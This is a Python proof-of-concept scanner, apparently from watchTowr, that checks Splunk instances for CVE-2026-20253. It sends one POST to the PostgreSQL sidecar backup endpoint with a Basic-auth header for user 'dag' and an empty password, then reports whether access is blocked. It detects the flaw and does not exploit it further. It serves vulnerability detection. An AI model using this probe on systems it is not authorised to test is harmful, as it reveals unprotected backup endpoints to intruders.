import argparse

import requests
import urllib3

banner = """
             __         ___  ___________
     __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________
     \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
      \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
       \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|
                  \\/          \\/     \\/

        watchTowr-vs-Splunk-CVE-2026-20253.py

        (*) CVE-2026-20253 Splunk PostgreSQL Sidecar Service Detection Artifact Generator

          - Piotr (@chudyPB) of watchTowr (@watchTowrcyber)
"""

# Requests below are sent with verify=False, so silence the resulting warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def dag(host, region):
    """Send a single POST to the sidecar backup endpoint and classify the response."""
    url = f"{host}{region}/splunkd/__raw/v1/postgres/recovery/backup"
    # "ZGFnOg==" is base64 for "dag:" (user "dag", empty password).
    headers = {"Authorization": "Basic ZGFnOg=="}

    try:
        resp = requests.post(url, headers=headers, verify=False, timeout=10)
    except requests.RequestException as exc:
        print(f'[!] Request failed: {exc}')
        return

    # A 400 with a decode error means the request reached the endpoint handler;
    # a 401 means the request was rejected before reaching it.
    if resp.status_code == 400 and 'Failed to decode' in resp.text:
        print('[+] VULNERABLE - access to /v1/postgres/recovery/backup not blocked')
    elif resp.status_code == 401:
        print('[-] NOT VULNERABLE - access to /v1/postgres/recovery/backup blocked')
    else:
        print('[+/-] UNKNOWN MESSAGE - please verify manually. PostgreSQL Sidecar Service may not be installed/enabled')


if __name__ == "__main__":
    print(banner)

    usage = """python3 poc.py [-h] -H HOST -r REGION \r\n\r\n\
For more help, use "python3 poc.py --help"
INFO HERE
"""

    parser = argparse.ArgumentParser(
        description='CVE-2026-20253 Splunk PostgreSQL Sidecar Service Detection Artifact Generator',
        usage=usage,
    )

    # Required arguments
    parser.add_argument('-H', dest='host', action="store", type=str,
                        help='Host, eg. "http://splunk.lab:8000"', required=True)
    parser.add_argument('-r', dest='region', action="store", type=str,
                        help='Region for your installation, eg. "en-US"', required=True)

    # Get arguments
    args = parser.parse_args()
    host = args.host
    region = args.region

    # Make sure the base URL ends with a slash before the region is appended.
    if not host.endswith('/'):
        host += '/'

    dag(host, region)